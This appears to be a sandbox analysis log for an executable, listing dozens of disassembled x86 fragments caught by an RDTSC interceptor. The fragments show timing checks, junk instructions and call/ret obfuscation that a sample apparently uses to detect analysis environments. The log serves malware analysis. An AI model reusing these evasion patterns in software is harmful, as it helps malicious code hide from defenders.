Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A89D6 second address: 9A8A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FFAA4EF80C8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 pushad 0x00000024 cmc 0x00000025 mov dx, E1B2h 0x00000029 popad 0x0000002a jnl 00007FFAA4EF80CCh 0x00000030 call 00007FFAA4EF80C9h 0x00000035 pushad 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jmp 00007FFAA4EF80CFh 0x0000003e popad 0x0000003f pushad 0x00000040 jmp 00007FFAA4EF80CFh 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8A44 second address: 9A8A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8A51 second address: 9A8A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8A55 second address: 9A8A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8A59 second address: 9A8A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8B9B second address: 9A8BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8BB7 second address: 9A8BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8BBB second address: 9A8C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FFAA4B0AF1Bh 0x0000000d nop 0x0000000e je 00007FFAA4B0AF1Ch 0x00000014 mov ecx, dword ptr [ebp+122D3577h] 0x0000001a push 00000000h 0x0000001c mov esi, dword ptr [ebp+122D3613h] 0x00000022 call 00007FFAA4B0AF19h 0x00000027 pushad 0x00000028 jmp 00007FFAA4B0AF1Eh 0x0000002d push ecx 0x0000002e jmp 00007FFAA4B0AF1Ch 0x00000033 pop ecx 0x00000034 popad 0x00000035 push eax 0x00000036 push edi 0x00000037 push edx 0x00000038 jmp 00007FFAA4B0AF25h 0x0000003d pop edx 0x0000003e pop edi 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 jl 00007FFAA4B0AF2Dh 0x00000049 pushad 0x0000004a jmp 00007FFAA4B0AF1Fh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8C40 second address: 9A8CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FFAA4EF80CBh 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007FFAA4EF80D3h 0x00000016 push edx 0x00000017 jbe 00007FFAA4EF80C6h 0x0000001d pop edx 0x0000001e popad 0x0000001f pop eax 0x00000020 stc 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D198Dh], esi 0x00000029 push 00000000h 0x0000002b add dword ptr [ebp+122D25EBh], ebx 0x00000031 push 00000003h 0x00000033 or cx, 0988h 0x00000038 push 58671ECCh 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FFAA4EF80CDh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8DB7 second address: 9A8DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BA5DA second address: 9BA5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CA862 second address: 9CA87C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAA4B0AF16h 0x00000008 jg 00007FFAA4B0AF16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FFAA4B0AF1Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C89BD second address: 9C89C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B0B second address: 9C8B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FFAA4B0AF16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B17 second address: 9C8B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B1B second address: 9C8B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B21 second address: 9C8B26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B26 second address: 9C8B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8C88 second address: 9C8CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAA4EF80C6h 0x0000000a jmp 00007FFAA4EF80D2h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 jg 00007FFAA4EF80C6h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FFAA4EF80D9h 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 je 00007FFAA4EF80CCh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8CD4 second address: 9C8CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8E1B second address: 9C8E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8E21 second address: 9C8E2B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAA4B0AF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8FBB second address: 9C8FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C910F second address: 9C9121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C9121 second address: 9C9151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D2h 0x00000007 ja 00007FFAA4EF80CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jne 00007FFAA4EF80C8h 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C097B second address: 9C0981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0981 second address: 9C0987 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0987 second address: 9C0995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FFAA4B0AF16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CED66 second address: 9CED6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CED6D second address: 9CED73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CED73 second address: 9CED77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF2CE second address: 9CF2E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAA4B0AF1Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F39 second address: 9D3F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F3F second address: 9D3F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F45 second address: 9D3F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F49 second address: 9D3F5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FFAA4B0AF26h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F5B second address: 9D3F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D40BE second address: 9D40C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D40C6 second address: 9D40D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FFAA4EF80C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D423C second address: 9D4242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4242 second address: 9D4246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4246 second address: 9D424A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D438C second address: 9D43A8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFAA4EF80C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop esi 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FFAA4EF80C6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D47D5 second address: 9D47F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Fh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D47F0 second address: 9D47F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D47F6 second address: 9D480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FFAA4B0AF18h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D480A second address: 9D4810 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7E7E second address: 9D7E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFAA4B0AF16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7E89 second address: 9D7E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7F75 second address: 9D7F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7F7B second address: 9D7F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7F7F second address: 9D7FAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAA4B0AF1Bh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFAA4B0AF25h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7FAF second address: 9D802C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FFAA4EF80CFh 0x0000000f jl 00007FFAA4EF80CCh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a js 00007FFAA4EF80CCh 0x00000020 pop eax 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007FFAA4EF80C8h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b movzx esi, cx 0x0000003e add di, BBC1h 0x00000043 push 2CB38B3Ah 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FFAA4EF80D3h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D802C second address: 9D8031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D8413 second address: 9D841D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D8CD4 second address: 9D8CEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D8F55 second address: 9D8F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D9038 second address: 9D903D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D92DA second address: 9D92DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D92DE second address: 9D92F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAA4B0AF22h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D985B second address: 9D985F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D9F52 second address: 9D9F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DAA1F second address: 9DAA25 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D9F56 second address: 9D9F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC786 second address: 9DC7E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov esi, dword ptr [ebp+122D293Ah] 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+12453B53h], edx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FFAA4EF80C8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 sub dword ptr [ebp+122D2C32h], edi 0x00000039 je 00007FFAA4EF80CCh 0x0000003f add edi, dword ptr [ebp+122D3463h] 0x00000045 xchg eax, ebx 0x00000046 push ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 jns 00007FFAA4EF80C6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DD203 second address: 9DD207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DD207 second address: 9DD215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEB8C second address: 9DEBB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FFAA4B0AF1Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEBB4 second address: 9DEBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E2654 second address: 9E2690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jns 00007FFAA4B0AF1Ch 0x0000000f nop 0x00000010 or edi, dword ptr [ebp+122D35FBh] 0x00000016 push 00000000h 0x00000018 jl 00007FFAA4B0AF18h 0x0000001e mov edi, eax 0x00000020 push 00000000h 0x00000022 movsx edi, ax 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FFAA4B0AF1Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E2690 second address: 9E2696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E3815 second address: 9E381C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E499B second address: 9E49A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6841 second address: 9E68B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAA4B0AF1Fh 0x00000008 jmp 00007FFAA4B0AF28h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+12453B38h], ecx 0x00000019 push 00000000h 0x0000001b add di, 63ABh 0x00000020 sub dword ptr [ebp+122D2DE0h], edi 0x00000026 push 00000000h 0x00000028 call 00007FFAA4B0AF1Fh 0x0000002d pushad 0x0000002e mov eax, ebx 0x00000030 sub ebx, 6990326Fh 0x00000036 popad 0x00000037 pop edi 0x00000038 push eax 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FFAA4B0AF23h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E381C second address: 9E38A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FFAA4EF80C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f and edi, dword ptr [ebp+122D36A7h] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov bh, 7Bh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov bh, dl 0x00000027 mov eax, dword ptr [ebp+122D1201h] 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FFAA4EF80C8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 sbb bx, 6AFCh 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007FFAA4EF80C8h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jns 00007FFAA4EF80C6h 0x00000072 jmp 00007FFAA4EF80CCh 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E38A7 second address: 9E38AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E38AD second address: 9E38BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6A4E second address: 9E6A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E38BD second address: 9E38C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6A53 second address: 9E6A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E7BD4 second address: 9E7BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8A76 second address: 9E8A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6A59 second address: 9E6AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FFAA4EF80C8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 xor dword ptr [ebp+122D1FE8h], edi 0x0000002a push dword ptr fs:[00000000h] 0x00000031 push edi 0x00000032 jmp 00007FFAA4EF80CFh 0x00000037 pop ebx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007FFAA4EF80C8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 